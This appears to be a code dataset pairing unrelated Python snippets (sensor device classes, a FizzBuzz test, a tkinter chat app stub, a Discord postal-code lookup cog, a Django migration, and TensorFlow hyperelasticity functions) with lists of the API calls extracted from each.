        :param device_id: The device ID
        """
        # Use the enum value instead of the magic string "0101" for
        # consistency with update_specifics() and create_device_from_data().
        super().__init__(device_id, DeviceType.DOOR_WINDOW_SENSOR.value)

    def update_specifics(self, data):
        """
        Updates the window "Open"/"Closed" state
        :param data: The data dict received from the actual device
        :raises AttributeError: if the data belongs to another device type
        """
        if data["data"]["device_name"] != DeviceType.DOOR_WINDOW_SENSOR.value:
            # Fix: the exception was previously constructed but never raised,
            # so type mismatches were silently ignored.
            raise AttributeError(f"Tried to update a window sensor to type "
                                 f"{DeviceType(data['data']['device_name'])}")
        if data["data"]["device_status"][4:-2] == "55":
            logging.debug("Door/window id " + str(self.id) + " open!")
            self.device_state = "Open"
        elif data["data"]["device_status"][4:-2] == "AA":
            logging.debug("Door/window id " + str(self.id) + " closed!")
            self.device_state = "Closed"
class AlarmSensor(Device):
    """
    A device that can ring an alarm (HeatAlarm, WaterAlarm, FireAlarm, COAlarm)
    """
    def __init__(self, device_id, device_type):
        """
        Constructor
        :param device_id: The device ID
        :param device_type: The device type
        """
        super().__init__(device_id, device_type)

    def update_specifics(self, data):
        """
        Updates the alarm state of the device.
        :param data: The data dict received from the actual device
        """
        # Status bytes 4..-2 encode the alarm condition: BB = alarm, AA = normal.
        status_code = data["data"]["device_status"][4:-2]
        if status_code == "BB":
            self.device_state = "Alarm"
        elif status_code == "AA":
            self.device_state = "Normal"
def create_device_from_data(data):
    """
    Factory method to create a device from a data dict
    :param data: The data dict received from the actual device
    :return: A Device object
    """
    device_info = data["data"]
    # Door/window sensors get their own subclass; everything else is an alarm.
    if device_info["device_name"] == DeviceType.DOOR_WINDOW_SENSOR.value:
        return WindowSensor(device_info["device_ID"])
    return AlarmSensor(device_info["device_ID"], device_info["device_name"])
"json.dumps",
"trio.Event"
] | [((783, 795), 'trio.Event', 'trio.Event', ([], {}), '()\n', (793, 795), False, 'import trio\n'), ((817, 829), 'trio.Event', 'trio.Event', ([], {}), '()\n', (827, 829), False, 'import trio\n'), ((1903, 1915), 'trio.Event', 'trio.Event', ([], {}), '()\n', (1913, 1915), False, 'import trio\n'), ((2058, 2070), 'trio.Event', 'trio.Event', ([], {}), '()\n', (2068, 2070), False, 'import trio\n'), ((3090, 3225), 'json.dumps', 'json.dumps', (["{'name': self.name, 'id': self.id, 'type': self.device_type, 'state': self.\n device_state, 'battery': self.battery_level}"], {}), "({'name': self.name, 'id': self.id, 'type': self.device_type,\n 'state': self.device_state, 'battery': self.battery_level})\n", (3100, 3225), False, 'import json\n')] |
from problems.fizz_buzz import FizzBuzz
def test_fizz_buzz():
    """FizzBuzz.compute() must return the classic fizzbuzz sequence for 1..100."""
    expected = []
    for n in range(1, 101):
        if n % 15 == 0:
            expected.append('fizzbuzz')
        elif n % 3 == 0:
            expected.append('fizz')
        elif n % 5 == 0:
            expected.append('buzz')
        else:
            expected.append(str(n))
    assert FizzBuzz.compute() == expected
| [
"problems.fizz_buzz.FizzBuzz.compute"
] | [((77, 95), 'problems.fizz_buzz.FizzBuzz.compute', 'FizzBuzz.compute', ([], {}), '()\n', (93, 95), False, 'from problems.fizz_buzz import FizzBuzz\n')] |
# Start Date: 3/9/2021
# Last Updated: 3/9/2021
# Author: <NAME>
# App Name: Chat App (Multi Client)
# Version: GUI Version 1.0
# Type: Server, Client
# import multiple_chat_app_server as mcas
# import multiple_chat_app_client as mcac
import os, sys
import tkinter
from tkinter import Label, ttk
def requirement_check():
    """Ensure the local 'database' directory exists, creating it if necessary."""
    # exist_ok=True avoids the check-then-create race of the previous
    # os.path.exists() + os.makedirs() pair and is idempotent.
    os.makedirs('database', exist_ok=True)
class MenuBar(tkinter.Menu):
    """The application's menu bar: a Connection menu and a Help menu."""

    def __init__(self, ws):
        """
        :param ws: the parent window (a tkinter.Tk instance)
        """
        tkinter.Menu.__init__(self, ws)
        connectionmenu = tkinter.Menu(self, tearoff=False)
        connectionmenu.add_command(label="New Connection", command=self.donothing, accelerator="Ctrl+N")
        self.bind_all('<Control-n>', self.donothing)
        connectionmenu.add_command(label="Open Connection", command=self.donothing, accelerator="Ctrl+O")
        self.bind_all('<Control-o>', self.donothing)
        connectionmenu.add_command(label="Close Connection", underline=1, command=self.donothing, accelerator="Ctrl+Q")
        self.bind_all('<Control-q>', self.donothing)
        connectionmenu.add_separator()
        connectionmenu.add_command(label="Exit", accelerator="Alt+F4", command=self.exit)
        self.bind_all('<Alt-F4>', self.exit)
        self.add_cascade(label="Connection", menu=connectionmenu)
        helpmenu = tkinter.Menu(self, tearoff=0)
        helpmenu.add_command(label="Help Index", command=self.donothing)
        self.add_cascade(label="Help", menu=helpmenu)

    def donothing(self, event=None):
        """Placeholder handler for unimplemented menu entries.

        Fix: menu ``command=`` callbacks are invoked with NO arguments, while
        key bindings pass an event — ``event=None`` makes both paths work
        (previously a menu click raised TypeError).
        """
        print('hi')

    def exit(self, event=None):
        """Terminate the application (menu click or Alt+F4)."""
        sys.exit()
class MainInterface(tkinter.Frame):
    """Main content area of the chat window (placeholder label for now)."""

    def __init__(self):
        tkinter.Frame.__init__(self)
        placeholder = tkinter.Label(
            self,
            text='hilkjfa asd jkaljkjakjd jaisdjsajfkj\nafdalkj l\n',
            bg="#000000",
        )
        placeholder.pack()
class App(tkinter.Tk):
    """Top-level window of the chat application: menu bar plus main frame."""

    def __init__(self):
        tkinter.Tk.__init__(self)
        self.title("Simple Chat App")
        self.geometry('500x400')
        menubar = MenuBar(self)
        frame = MainInterface()
        frame.pack()
        # Attach the menu bar last, after all widgets are created.
        self.config(menu=menubar)
# def gui_draw():
# main_frame = tkinter.Frame(root, width="500px", height="400px", bg="")
# main_frame.pack()
# btn = tkinter.Button(root, text="Hi", width=6)
# btn.place(x=10, y=100)
# root.config(menu=menubar)
# root.resizable(0,0)
# root.mainloop()
if __name__ == "__main__":
    # Connection settings — must match the values configured on the peer side.
    address = "127.0.0.1" # change server IP, don't forget to change in client
    port = 4444 # change port number, don't forget to change in client
    username = "User" # change Username
    requirement_check()
    app = App()
    app.mainloop()  # blocks until the window is closed
    # gui_draw()
| [
"tkinter.Menu",
"os.path.exists",
"tkinter.Frame.__init__",
"os.makedirs",
"tkinter.Tk.__init__",
"tkinter.Menu.__init__",
"tkinter.Label",
"sys.exit"
] | [((349, 375), 'os.path.exists', 'os.path.exists', (['"""database"""'], {}), "('database')\n", (363, 375), False, 'import os, sys\n'), ((387, 410), 'os.makedirs', 'os.makedirs', (['"""database"""'], {}), "('database')\n", (398, 410), False, 'import os, sys\n'), ((481, 512), 'tkinter.Menu.__init__', 'tkinter.Menu.__init__', (['self', 'ws'], {}), '(self, ws)\n', (502, 512), False, 'import tkinter\n'), ((542, 575), 'tkinter.Menu', 'tkinter.Menu', (['self'], {'tearoff': '(False)'}), '(self, tearoff=False)\n', (554, 575), False, 'import tkinter\n'), ((1364, 1393), 'tkinter.Menu', 'tkinter.Menu', (['self'], {'tearoff': '(0)'}), '(self, tearoff=0)\n', (1376, 1393), False, 'import tkinter\n'), ((1622, 1632), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1630, 1632), False, 'import os, sys\n'), ((1708, 1736), 'tkinter.Frame.__init__', 'tkinter.Frame.__init__', (['self'], {}), '(self)\n', (1730, 1736), False, 'import tkinter\n'), ((1818, 1916), 'tkinter.Label', 'tkinter.Label', (['self'], {'text': '"""hilkjfa asd jkaljkjakjd jaisdjsajfkj\nafdalkj l\n"""', 'bg': '"""#000000"""'}), '(self, text=\n """hilkjfa asd jkaljkjakjd jaisdjsajfkj\nafdalkj l\n""", bg=\'#000000\')\n', (1831, 1916), False, 'import tkinter\n'), ((2004, 2029), 'tkinter.Tk.__init__', 'tkinter.Tk.__init__', (['self'], {}), '(self)\n', (2023, 2029), False, 'import tkinter\n')] |
from discord.ext import commands
import requests
class Cep(commands.Cog):
    """ Looks up Brazilian postal codes (CEP) via the ViaCEP web service. """
    def __init__(self, bot):
        self.bot = bot

    @commands.command(name = 'cep',help="Verifica os dados de um CEP Brasileiro")
    async def consult_cep(self, ctx, cep):
        """
        Queries https://viacep.com.br for *cep* and replies with the address.
        :param ctx: command invocation context
        :param cep: 8-character Brazilian postal code (digits only)
        """
        # A valid CEP has exactly 8 characters (was: len>8 or len<8).
        if len(cep) != 8:
            await ctx.send(f'CEP inválido')
            return
        try:
            response = requests.get(f'https://viacep.com.br/ws/{cep}/json/')
            data = response.json()
            localidade = data.get('localidade')
            bairro = data.get('bairro')
            logradouro = data.get('logradouro')
            complemento = data.get('complemento')
            await ctx.send(f'Localidade:{localidade}\nBairro:{bairro}\nLogradouro:{logradouro}\nComplemento: {complemento}')
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed; the user still gets a friendly message.
            await ctx.send('Algo inesperado aconteceu...')
def setup(bot):
    # discord.py extension entry point: registers the Cep cog on *bot*.
    bot.add_cog(Cep(bot))
| [
"discord.ext.commands.command",
"requests.get"
] | [((170, 245), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""cep"""', 'help': '"""Verifica os dados de um CEP Brasileiro"""'}), "(name='cep', help='Verifica os dados de um CEP Brasileiro')\n", (186, 245), False, 'from discord.ext import commands\n'), ((473, 526), 'requests.get', 'requests.get', (['f"""https://viacep.com.br/ws/{cep}/json/"""'], {}), "(f'https://viacep.com.br/ws/{cep}/json/')\n", (485, 526), False, 'import requests\n')] |
# Generated by Django 2.2 on 2019-05-16 07:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: add a uniqueness constraint to Map2011.old_survey_ward_code."""

    dependencies = [
        ('ward_mapping', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='map2011',
            name='old_survey_ward_code',
            field=models.CharField(max_length=30, unique=True),
        ),
    ]
| [
"django.db.models.CharField"
] | [((343, 387), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)', 'unique': '(True)'}), '(max_length=30, unique=True)\n', (359, 387), False, 'from django.db import migrations, models\n')] |
# Standard imports
import keras as k
import tensorflow as tf
import numpy as np
"""
NOTE:
All functions in this file are directly adopted from continuum mechanics fundamentals
and hence do not need further introduction. In order to not inflate this file
unnecessarily with comments (and sacrificing readability), we decided to mostly omit
the type of comment blocks we put in all other functions of this project. These
comment blocks are only present when we deemed them necessary.
Explanations to the continuum mechanics basics utilized can be found in the article
and/or standard textbooks on the subject.
The functions in this file can be sorted into three groups:
- basic continuum mechanics functions
- collective continuum mechanics functions (that chain basic functions in a meaningful
order)
- Simple analytical strain-energy functions (for test runs or as artificial data
sources)
"""
##########################################################################################
##########################################################################################
###### BASIC CONTINUUM MECHANICS FUNCTIONS ###############################################
##########################################################################################
##########################################################################################
def wrapper(numTens, numDir):
    """
    Returns all basic continuum mechanics functions which have a direct dependency on the
    number of generalized structural tensors or preferred directions to use. The returned
    functions are tailored to the desired specifications.
    Parameters
    ----------
    numTens : int
        Number of generalized structural tensors to use (at least 1).
    numDir : int
        Number of preferred directions to use (0 for isotropy, more than 0 for anisotropy).
    Returns
    -------
    ten2_H : function
        A function for generalized structural tensors.
    invariants_I : function
        A function for generalized invariants I.
    invariants_J : function
        A function for generalized invariants J.
    """
    def ten2_H(L, w): # Generalized structural tensors: H_r = \sum_i w_ri * L_i [?,numTens,3,3]
        batchSize = tf.shape(w)[0]
        # Create L_0 and add it to L
        # (the "shaper" trick builds a per-axis tile multiplier with a dynamic batch dim)
        shaper = batchSize*tf.constant([1,0,0,0]) + tf.constant([0,1,1,1])
        L_0 = 1.0/3.0 * tf.tile(tf.keras.backend.expand_dims(tf.keras.backend.expand_dims(tf.eye(3),0),0), shaper)
        if numDir > 0:
            L = tf.concat([L_0, L], axis=1)
        else:
            L = L_0
        # Expand L (to get one for each numTens)
        shaper = numTens*tf.constant([0,1,0,0,0]) + tf.constant([1,0,1,1,1])
        L = tf.tile(tf.keras.backend.expand_dims(L, 1), shaper)
        # Expand w
        shaper = tf.constant([1,1,1,3])
        w = tf.tile(tf.keras.backend.expand_dims(w, 3), shaper)
        shaper = tf.constant([1,1,1,1,3])
        w = tf.tile(tf.keras.backend.expand_dims(w, 4), shaper)
        # Multiply L with weights
        L_weighted = tf.math.multiply(L, w)
        # Sum them up for the corresponding H
        H = tf.math.reduce_sum(L_weighted, axis=2)
        return H
    def invariants_I(C, H): # Generalized invariants I: I_r = trace(C*H_r) [?,numTens]
        shaper = tf.constant([1,numTens,1,1])
        C_tile = tf.tile(tf.keras.backend.expand_dims(C, 1), shaper)
        return tf.linalg.trace(tf.matmul(C_tile,H))
    def invariants_J(C, H): # Generalized invariants J: J_r = trace(cofactor(C)*H_r) [?,numTens]
        shaper = tf.constant([1,numTens,1,1])
        C_tile = tf.tile(tf.keras.backend.expand_dims(C, 1), shaper)
        # cofactor(C) = det(C) * C^-T, assembled below element-wise
        detC_tile = tf.linalg.det(C_tile)
        shaper = tf.constant([1,1,3])
        detC_tile = tf.tile(tf.keras.backend.expand_dims(detC_tile, 2), shaper)
        shaper = tf.constant([1,1,1,3])
        detC_tile = tf.tile(tf.keras.backend.expand_dims(detC_tile, 3), shaper)
        invTransC = tf.linalg.inv(tf.transpose(C_tile, perm=[0, 1, 3, 2]))
        mul = tf.math.multiply(detC_tile, invTransC)
        matmul = tf.matmul(mul, H)
        return tf.linalg.trace(matmul)
    return ten2_H, invariants_I, invariants_J
def defGrad_ut(lam): # Deformation gradient for incompressible uniaxial tension loading [?,3,3]
    count = len(lam)
    F = np.zeros([count, 3, 3])
    # Lateral directions contract by 1/sqrt(lambda) so that det(F) = 1.
    lateral = 1.0/(np.sqrt(lam))
    F[:, 0, 0] = lam
    F[:, 1, 1] = lateral
    F[:, 2, 2] = lateral
    return F
def defGrad_bt(lam): # Deformation gradient for incompressible equi-biaxial loading [?,3,3]
    F = np.zeros([len(lam), 3, 3])
    # Both in-plane axes stretch equally; thickness shrinks to keep det(F) = 1.
    for axis in (0, 1):
        F[:, axis, axis] = lam
    F[:, 2, 2] = 1.0/lam**2
    return F
def defGrad_ps(lam): # Deformation gradient for incompressible pure shear loading [?,3,3]
    count = len(lam)
    F = np.zeros([count, 3, 3])
    F[:, 0, 0] = lam
    F[:, 1, 1] = 1/lam       # reciprocal stretch keeps det(F) = 1
    F[:, 2, 2] = 1.0         # out-of-plane direction is held fixed
    return F
def ten2_C(F): # Right Cauchy-Green tensor: C = F^T * F [?,3,3]
    # transpose_a transposes the trailing two (matrix) dimensions of F.
    return tf.linalg.matmul(a=F, b=F, transpose_a=True)
def ten2_F_isoRef(F): # Deformation gradient in reference configuration [?,3,3]
    # In Order for the other formulae to work we need the correct dimension required to produce enough eye matrices/tensors
    # (i.e. one 3x3 identity per batch entry, with the batch size taken from F at runtime)
    shaper = tf.shape(F)[0]
    shaper = shaper*tf.constant([1,0,0]) + tf.constant([0,1,1])
    F_isoRef = tf.tile(tf.keras.backend.expand_dims(tf.eye(3),0), shaper)
    return F_isoRef
def ten2_L(dir): # Structural tensor L_i = l_i (x) l_i [?,numDir,3,3]
    # Outer product of each direction with itself: column vector times row vector.
    col = tf.keras.backend.expand_dims(dir, 3)
    row = tf.transpose(col, perm=[0, 1, 3, 2])
    return tf.linalg.matmul(col, row)
def invariant_I3(C): # Third invariant of a tensor C: I3 = det(C) [?,1]
    det = tf.linalg.det(C)
    return tf.keras.backend.expand_dims(det, 1)
def invariants2principalStretches(I1_arr, I2_arr, I3_arr): # Calculates the principal stretches based on invariants of C [only used for one specific kind of plot]
    # Itskov, 2015, Tensor Algebra and Tensor Analysis for Engineers, 4th edition, p. 103-104
    dim = I1_arr.shape
    # Fix: np.complex_ and np.NaN are deprecated aliases that were removed in
    # NumPy 2.0 — use np.complex128 and np.nan (identical behavior on 1.x).
    eig = np.empty((dim[0], 3), dtype=np.complex128)
    eig[:, :] = np.nan
    for i in range(dim[0]):
        I1 = I1_arr[i]
        I2 = I2_arr[i]
        I3 = I3_arr[i]
        if np.abs(np.power(I1,2)-3.*I2) > 1e-6:
            # Distinct eigenvalues: closed-form Cardano solution via angle theta.
            nom = 2.*np.power(I1,3) - 9.*np.multiply(I1,I2) + 27.*I3
            denom = 2.*np.power(np.power(I1,2) - 3*I2,1.5)
            theta = np.arccos(nom/denom)
            for k in [1, 2, 3]:
                eig[i,k-1] = (I1 + 2*np.sqrt(np.power(I1,2)-3.*I2)*np.cos((theta+2*np.pi*(k-1.))/3.))/3.
        else:
            # (Nearly) triple eigenvalue: limit form of the general solution.
            for k in [1, 2, 3]:
                eig[i,k-1] = I1/3. + 1./3.*np.power(27.*I3-np.power(I1,3), 1./3.) * (np.cos(2./3.*np.pi*k) + (0+1j)*np.sin(2./3.*np.pi*k))
    # Principal stretches of U are the square roots of the eigenvalues of C.
    principalStretch = np.sqrt(eig)
    return principalStretch
return principalStretch
def ten2_P(Psi, F): # First Piola Kirchhoff stress tensor: P = dPsi / dF [?,3,3]
    # NOTE(review): tf.gradients only works in graph mode (TF1 / inside a
    # tf.function); unconnected_gradients='zero' yields zeros where Psi does
    # not depend on F.
    der = tf.gradients(Psi, F, unconnected_gradients='zero')
    return der[0]
def ten2_P_lagMul(P_iso, F, lagMul): # Lagrange multiplier for incompressibility [?,1]
    # P = P_iso - p * F^-T, where p is the (tiled) Lagrange multiplier.
    F_invT = tf.linalg.inv(tf.transpose(F, perm=[0, 2, 1]))
    lagMul_tiled = tf.tile(tf.keras.backend.expand_dims(lagMul, 2), tf.constant([1, 3, 3]))
    pressure_term = tf.math.multiply(lagMul_tiled, F_invT)
    return tf.math.subtract(P_iso, pressure_term)
def ten2_S(P, F): # Second Piola Kirchhoff stress tensor: S = F^-1 * P [?,3,3]
    F_inv = tf.linalg.inv(F)
    return tf.matmul(F_inv, P)
def ten2_sigma(P, F, J): # Cauchy stress tensor: sigma = J^-1 * P * F^T [?,3,3]
    # Broadcast 1/J to a [?,3,3] factor, then scale P * F^T element-wise.
    J_inv = tf.tile(tf.keras.backend.expand_dims(tf.math.divide(1.0,J),2), tf.constant([1,3,3]))
    P_Ft = tf.matmul(P, tf.transpose(F, perm=[0, 2, 1]))
    return tf.math.multiply(J_inv, P_Ft)
##########################################################################################
##########################################################################################
###### COLLECTIVE CONTINUUM MECHANICS FUNCTIONS ##########################################
##########################################################################################
##########################################################################################
def pre_Psi(numExtra, numTens, numDir, w_model, dir_model): # Deals with everything before the strain-energy is used (deformation measures, structural tensors, invariants)
    # Returns the Keras input layers (F, extra) plus all derived deformation
    # measures and generalized invariants, both for the current deformation
    # and for the undeformed (isotropic reference) configuration.
    ten2_H, invariants_I, invariants_J = wrapper(numTens, numDir)
    if numExtra == 0:
        extra = []
    else:
        extra = k.layers.Input(shape=(numExtra,), name='extra') # INPUT
    # Deformation measures
    F = k.layers.Input(shape=(3,3,), name='F') # INPUT
    C = k.layers.Lambda(lambda F: ten2_C(F), name='C' )(F)
    # Directions and structure tensors
    if numDir == 0:
        dir = [] # we do not need directions (and hence their sub-ANN) at all
        w = tf.ones([tf.shape(F)[0],numTens,1]) # we do not need a sub-ANN to get the weights
        L = []
    else:
        dir = dir_model(extra)
        w = w_model(extra)
        L = k.layers.Lambda(lambda dir: ten2_L(dir), name='L')(dir)
    # Generalized structure tensors
    H = k.layers.Lambda(lambda x: ten2_H(x[0], x[1]), name='H')([L, w])
    # Generalized invariants
    inv_I = k.layers.Lambda(lambda x: invariants_I(x[0], x[1]), name='invariants_I' )([C,H])
    inv_J = k.layers.Lambda(lambda x: invariants_J(x[0], x[1]), name='invariants_J' )([C,H])
    inv_III_C = k.layers.Lambda(lambda C: invariant_I3(C) , name='invariant_III_C')(C)
    # Determination of the exact reference configuration (F = identity)
    F_isoRef = k.layers.Lambda(lambda F: ten2_F_isoRef(F), output_shape=(None,3,3), name='F_isoRef' )(F)
    C_isoRef = k.layers.Lambda(lambda F: ten2_C(F) , name='C_isoRef' )(F_isoRef)
    inv_I_isoRef = k.layers.Lambda(lambda x: invariants_I(x[0], x[1]) , name='invariants_I_isoRef' )([C_isoRef,H])
    inv_J_isoRef = k.layers.Lambda(lambda x: invariants_J(x[0], x[1]) , name='invariants_J_isoRef' )([C_isoRef,H])
    inv_III_C_isoRef = k.layers.Lambda(lambda C_isoRef: invariant_I3(C_isoRef) , name='invariant_III_C_isoRef')(C_isoRef)
    return F, extra, C, inv_I, inv_J, inv_III_C, F_isoRef, C_isoRef, inv_I_isoRef, inv_J_isoRef, inv_III_C_isoRef
def post_Psi(Psi, F): # Deals with everything after the strain-energy is used [variant for compressible materials] (stresses)
    """Derive the stress measures from the strain energy (compressible case).

    Builds the first Piola-Kirchhoff stress layer 'P' from (Psi, F) and
    delegates the remaining common stress quantities to post_Psi_both.
    """
    def _first_pk(inputs):
        # First Piola-Kirchhoff stress from strain energy and deformation gradient.
        return ten2_P(inputs[0], inputs[1])
    first_pk = k.layers.Lambda(_first_pk, name='P')([Psi, F])
    return post_Psi_both(Psi, first_pk, F)
def post_Psi_incomp(Psi, Psi_isoRef, F, F_isoRef): # Deals with everything after the strain-energy is used [variant for incompressible materials] (stresses)
    """Derive the stress measures from the strain energy (incompressible case).

    The Lagrange multiplier (hydrostatic pressure term) is identified from the
    (1,1) component of the stress in the isochoric reference configuration and
    then used to constrain the first Piola-Kirchhoff stress; the remaining
    common stress quantities come from post_Psi_both.
    """
    def _pk(inputs):
        # Unconstrained first Piola-Kirchhoff stress from (Psi, F).
        return ten2_P(inputs[0], inputs[1])
    def _p11_column(P):
        # Extract the (1,1) component as a column vector of shape (batch, 1).
        return tf.keras.backend.expand_dims(P[:,0,0],1)
    def _pk_constrained(inputs):
        # First Piola-Kirchhoff stress with the Lagrange-multiplier constraint applied.
        return ten2_P_lagMul(inputs[0], inputs[1], inputs[2])
    stress_iso = k.layers.Lambda(_pk, name='P_iso'   )([Psi, F])
    stress_ref = k.layers.Lambda(_pk, name='P_isoRef')([Psi_isoRef, F_isoRef])
    pressure   = k.layers.Lambda(_p11_column, name='lagMul')(stress_ref)
    stress     = k.layers.Lambda(_pk_constrained, name='P')([stress_iso, F, pressure])
    return post_Psi_both(Psi, stress, F)
def post_Psi_both(Psi, P, F): # Common parts from post_Psi & post_Psi_incomp
    """Build the stress quantities shared by both material variants.

    From the first Piola-Kirchhoff stress P and the deformation gradient F,
    computes the second Piola-Kirchhoff stress S, the volume ratio J = det(F),
    the Cauchy stress sigma, and the P11 component as a (batch, 1) column.

    Returns:
        Tuple (P11, P, S, sigma) of Keras tensors.
    """
    def _second_pk(inputs):
        # Second Piola-Kirchhoff stress from (P, F).
        return ten2_S(inputs[0], inputs[1])
    def _volume_ratio(F):
        # J = det(F), expanded to shape (batch, 1).
        return tf.keras.backend.expand_dims(tf.linalg.det(F),1)
    def _cauchy(inputs):
        # Cauchy (true) stress from (P, F, J).
        return ten2_sigma(inputs[0], inputs[1], inputs[2])
    def _p11_column(P):
        # (1,1) component of P as a (batch, 1) column.
        return tf.keras.backend.expand_dims(P[:,0,0],1)
    S     = k.layers.Lambda(_second_pk,    name='S'    )([P, F])
    J     = k.layers.Lambda(_volume_ratio, name='J'    )(F)
    sigma = k.layers.Lambda(_cauchy,       name='sigma')([P, F, J])
    P11   = k.layers.Lambda(_p11_column,   name='P11'  )(P)
    return P11, P, S, sigma
##########################################################################################
##########################################################################################
###### ANALYTICAL STRAIN ENERGY DENSITY FUNCTIONS ########################################
##########################################################################################
##########################################################################################
def MooneyRivlin6term_wrapper(c10, c20, c30, c01, c02, c03):
    """Return a six-term Mooney-Rivlin strain-energy callable.

    The six material coefficients are captured by closure; the returned
    function maps the generalized invariants (I, J, I3) to the strain-energy
    layer 'Psi'.
    """
    def MooneyRivlin6term(I, J, I3):
        # Recover the classical invariants I1, I2 from the generalized ones.
        first_inv  = I*3.0
        second_inv = J*3.0
        def _energy(x):
            # Polynomial series in (I1 - 3) and (I2 - 3), three terms each.
            return (c10*(x[0]-3.0) + c20*(x[0]-3.0)**2 + c30*(x[0]-3.0)**3
                    + c01*(x[1]-3.0) + c02*(x[1]-3.0)**2 + c03*(x[1]-3.0)**3)
        return k.layers.Lambda(_energy, name='Psi')([first_inv, second_inv, I3])
    return MooneyRivlin6term
def NeoHookean_wrapper(c):
    """Return a Neo-Hookean strain-energy callable with coefficient c.

    The returned function maps the generalized invariants (I, J, I3) to the
    strain-energy layer 'Psi'. Only the first invariant enters the energy;
    the other inputs are kept so all analytical energies share the same
    Lambda input signature.
    """
    def NeoHookean(I, J, I3):
        # Recover the classical invariants I1, I2 from the generalized ones.
        first_inv  = I*3.0
        second_inv = J*3.0
        return k.layers.Lambda(lambda x: c*(x[0]-3.0), name='Psi')([first_inv, second_inv, I3])
    return NeoHookean
def MooneyRivlin_wrapper(c1, c2):
    """Return a two-term Mooney-Rivlin strain-energy callable.

    The two material coefficients are captured by closure; the returned
    function maps the generalized invariants (I, J, I3) to the strain-energy
    layer 'Psi'.
    """
    def MooneyRivlin(I, J, I3):
        # Recover the classical invariants I1, I2 from the generalized ones.
        first_inv  = I*3.0
        second_inv = J*3.0
        def _energy(x):
            # Linear terms in (I1 - 3) and (I2 - 3).
            return c1*(x[0]-3.0) + c2*(x[1]-3.0)
        return k.layers.Lambda(_energy, name='Psi')([first_inv, second_inv, I3])
    return MooneyRivlin
"numpy.sqrt",
"tensorflow.shape",
"tensorflow.transpose",
"tensorflow.math.subtract",
"numpy.arccos",
"tensorflow.linalg.inv",
"tensorflow.math.divide",
"tensorflow.gradients",
"numpy.sin",
"tensorflow.keras.backend.expand_dims",
"tensorflow.eye",
"numpy.multiply",
"tensorflow.concat",
"te... | [((4611, 4651), 'tensorflow.linalg.matmul', 'tf.linalg.matmul', (['F', 'F'], {'transpose_a': '(True)'}), '(F, F, transpose_a=True)\n', (4627, 4651), True, 'import tensorflow as tf\n'), ((5108, 5144), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['dir', '(3)'], {}), '(dir, 3)\n', (5136, 5144), True, 'import tensorflow as tf\n'), ((5154, 5190), 'tensorflow.transpose', 'tf.transpose', (['dir'], {'perm': '[0, 1, 3, 2]'}), '(dir, perm=[0, 1, 3, 2])\n', (5166, 5190), True, 'import tensorflow as tf\n'), ((5196, 5224), 'tensorflow.linalg.matmul', 'tf.linalg.matmul', (['dir', 'dir_t'], {}), '(dir, dir_t)\n', (5212, 5224), True, 'import tensorflow as tf\n'), ((5652, 5692), 'numpy.empty', 'np.empty', (['(dim[0], 3)'], {'dtype': 'np.complex_'}), '((dim[0], 3), dtype=np.complex_)\n', (5660, 5692), True, 'import numpy as np\n'), ((6269, 6281), 'numpy.sqrt', 'np.sqrt', (['eig'], {}), '(eig)\n', (6276, 6281), True, 'import numpy as np\n'), ((6397, 6447), 'tensorflow.gradients', 'tf.gradients', (['Psi', 'F'], {'unconnected_gradients': '"""zero"""'}), "(Psi, F, unconnected_gradients='zero')\n", (6409, 6447), True, 'import tensorflow as tf\n'), ((6704, 6739), 'tensorflow.math.multiply', 'tf.math.multiply', (['lagMul', 'FtransInv'], {}), '(lagMul, FtransInv)\n', (6720, 6739), True, 'import tensorflow as tf\n'), ((6749, 6782), 'tensorflow.math.subtract', 'tf.math.subtract', (['P_iso', 'lastTerm'], {}), '(P_iso, lastTerm)\n', (6765, 6782), True, 'import tensorflow as tf\n'), ((7994, 8032), 'keras.layers.Input', 'k.layers.Input', ([], {'shape': '(3, 3)', 'name': '"""F"""'}), "(shape=(3, 3), name='F')\n", (8008, 8032), True, 'import keras as k\n'), ((2682, 2707), 'tensorflow.constant', 'tf.constant', (['[1, 1, 1, 3]'], {}), '([1, 1, 1, 3])\n', (2693, 2707), True, 'import tensorflow as tf\n'), ((2774, 2802), 'tensorflow.constant', 'tf.constant', (['[1, 1, 1, 1, 3]'], {}), '([1, 1, 1, 1, 3])\n', (2785, 2802), True, 'import tensorflow as tf\n'), ((2902, 
2924), 'tensorflow.math.multiply', 'tf.math.multiply', (['L', 'w'], {}), '(L, w)\n', (2918, 2924), True, 'import tensorflow as tf\n'), ((2973, 3011), 'tensorflow.math.reduce_sum', 'tf.math.reduce_sum', (['L_weighted'], {'axis': '(2)'}), '(L_weighted, axis=2)\n', (2991, 3011), True, 'import tensorflow as tf\n'), ((3123, 3154), 'tensorflow.constant', 'tf.constant', (['[1, numTens, 1, 1]'], {}), '([1, numTens, 1, 1])\n', (3134, 3154), True, 'import tensorflow as tf\n'), ((3370, 3401), 'tensorflow.constant', 'tf.constant', (['[1, numTens, 1, 1]'], {}), '([1, numTens, 1, 1])\n', (3381, 3401), True, 'import tensorflow as tf\n'), ((3479, 3500), 'tensorflow.linalg.det', 'tf.linalg.det', (['C_tile'], {}), '(C_tile)\n', (3492, 3500), True, 'import tensorflow as tf\n'), ((3512, 3534), 'tensorflow.constant', 'tf.constant', (['[1, 1, 3]'], {}), '([1, 1, 3])\n', (3523, 3534), True, 'import tensorflow as tf\n'), ((3618, 3643), 'tensorflow.constant', 'tf.constant', (['[1, 1, 1, 3]'], {}), '([1, 1, 1, 3])\n', (3629, 3643), True, 'import tensorflow as tf\n'), ((3798, 3836), 'tensorflow.math.multiply', 'tf.math.multiply', (['detC_tile', 'invTransC'], {}), '(detC_tile, invTransC)\n', (3814, 3836), True, 'import tensorflow as tf\n'), ((3848, 3865), 'tensorflow.matmul', 'tf.matmul', (['mul', 'H'], {}), '(mul, H)\n', (3857, 3865), True, 'import tensorflow as tf\n'), ((3878, 3901), 'tensorflow.linalg.trace', 'tf.linalg.trace', (['matmul'], {}), '(matmul)\n', (3893, 3901), True, 'import tensorflow as tf\n'), ((4110, 4122), 'numpy.sqrt', 'np.sqrt', (['lam'], {}), '(lam)\n', (4117, 4122), True, 'import numpy as np\n'), ((4141, 4153), 'numpy.sqrt', 'np.sqrt', (['lam'], {}), 